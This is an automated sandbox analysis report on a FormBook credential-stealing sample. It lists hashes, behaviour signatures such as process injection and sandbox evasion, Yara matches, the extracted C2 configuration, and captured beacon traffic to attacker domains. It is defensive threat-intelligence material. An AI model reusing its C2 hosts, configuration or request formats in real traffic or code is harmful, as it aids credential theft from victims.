Windows Analysis Report
vbc.exe

Overview

General Information

Sample Name: vbc.exe
Analysis ID: 680447
MD5: ba5fa6ee78fe62b57ce7947f6bdb86ff
SHA1: f8409167b9b3e09f390c28cbcebfbec670af16de
SHA256: c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: vbc.exe ReversingLabs: Detection: 31%
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: vbc.exe Joe Sandbox ML: detected
Source: 6.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.reliabenefitssupport.com/etn4/"], "decoy": ["rV2+KhY2v4ETgrjhsOdtLg==", "eSFnVjRiqHAIadtGwrlpa74g6QcN", "WZH5aS87DxPqd6LDQIeq4JfVOck=", "YXnbVkLXpUHo30zy", "ESabcsMz4lz1XQ==", "mL0iinqiZDYNlkQ=", "jkmgFdnw4lz1XQ==", "G7v+3ZquDaYqgMM44ViNN86tgw==", "fENjGOD2ZVQDed3Mwx8=", "iCtlTip4Pd1nyU7+qostG4sg6QcN", "qcQk+tw6bXxKYg7Bt6U1", "7Z374sbf2YQ20GDBt6U1", "P/5LupTXJv+9QA==", "okeclmSxOBqVypK3Qbw/N86tgw==", "5qsId0poQS3V/igYoQ==", "c4Ho3qfDIR7N3N3Mwx8=", "6IPSTh4/Dd9+AxAt9JBvIgw=", "87ESB8bRIASQ21AHs4srEJUueZ4bcCA=", "ed5PMq5cJ7wf", "KOdLpJv3iTfGC/Yh8JBvIgw=", "IjuokGaEheWX0kXw", "54lp0LAGDcjT+sLlsOdtLg==", "hUCHBtHr4lz1XQ==", "Smr7HOz3z9Lo30zy", "SlvEQBVnZhEXRcUipw==", "8ZRlzaD4vtLo30zy", "hzUJ6+ZA0Ni5593Mwx8=", "CBpvZ0VrqnIimUD78pBvIgw=", "gevEKiV7emwbk4167ErNe3RucHmhf5gZ", "+7WJXFqv+stZyH4ts6O2ZpfVOck=", "xWhDroGpqZFTohQ1qw==", "DiNuwbgR1pInnYrsWfModZfVOck=", "VCNwUfqPHCj2gCKUOdCLDwY=", "Zbyd6qqyqv3+qibRwh0=", "hQ8A9Mn1PV8/ahDBt6U1", "bRsE/+D2dYA3px6Nm5Ar", "13fAoonmbJt7x/YhlQWeZF+xNMM=", "OUNALhAnXym6C27oYZBvIgw=", "/JFzZjNNy8FufbxiR5y7bpfVOck=", "Ezt/7MDk88rfAbyyXDf6ri6D", "OveJTrEkjffzEUw=", "P+nKsn6TDRbhcyzWXkjZxIdyP94=", "qj0kA9PnPj0HLGYL3o2LCzSF", "xoHVLjFOiHpklb9iXNEA822rlA==", "Me5FrmyQQ1ktS4j+pQH9c5fVOck=", "fhrqUiZJWjVO3QD3", "uWEoEq8LmA==", "ki96WDIo+QLw6vAPddk9", "SILf07XfI+B53VrBt6U1", "zI/68LrZeDDuEE4=", "Ude5qpW19dSOFsx3/uZ/gN7X1gFcHg==", "K+FAq4KZIOLiaxTKvA/6ri6D", "8AVbxnGVmZ90l2BBFGMi", "321HQPJDy7V8oVBK8uPhGoog6QcN", "tG83oX2Ynbmj6VvBt6U1", "9Y55bFqvNyboed3Mwx8=", "O88UfEGPq1PPJaZS9hSYZBs=", "XyL3blOj7cF7nt6NDu3mrvcOI6YF", "u0+YhnzTEtKgw1H4", "vSmevGTLljuzSg==", "K+w3E/dcJ7wf", "X2+vnIixBeq6593Mwx8=", "aPPTtXp9zMh68pQD/AinOQ==", "p1Y3rXrJMTUeWaFaQ74HQ5Qg6QcN"]}
Source: vbc.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vbc.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 192.185.131.238 80
Source: C:\Windows\explorer.exe Network Connect: 108.167.169.56 80
Source: C:\Windows\explorer.exe Network Connect: 103.141.97.24 80
Source: C:\Windows\explorer.exe Domain query: www.funwave.info
Source: C:\Windows\explorer.exe Domain query: www.tadeumilhosrp.com
Source: C:\Windows\explorer.exe Domain query: www.reprograme-se10x.com
Source: Malware configuration extractor URLs: www.reliabenefitssupport.com/etn4/
Source: Joe Sandbox View ASN Name: VECTANTARTERIANetworksCorporationJP
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1Host: www.funwave.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1Host: www.reprograme-se10x.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 192.185.131.238
Source: global traffic HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
Source: global traffic HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.tadeumilhosrp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tadeumilhosrp.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc(8yie5wegPdbB7rUhaa0(Zn5IlS9ligmiYopxieZB2awPs8SjSvbasZRcUOQ7K6UlZxCvmoBMqaMDMIXboV9arRz673S3L8-kWC2Zfj0wsJhFvOtG9(SOG3hVyl7tOM25bjMtP28(wTicBvt0W095nGqg.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 14:11:20 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://reprograme-se10x.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14456Content-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:27 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:30 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"
Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: control.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf
Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
Source: control.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: vbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comtpuKK
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
Source: unknown HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
Source: unknown DNS traffic detected: queries for: www.funwave.info

E-Banking Fraud

Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: vbc.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
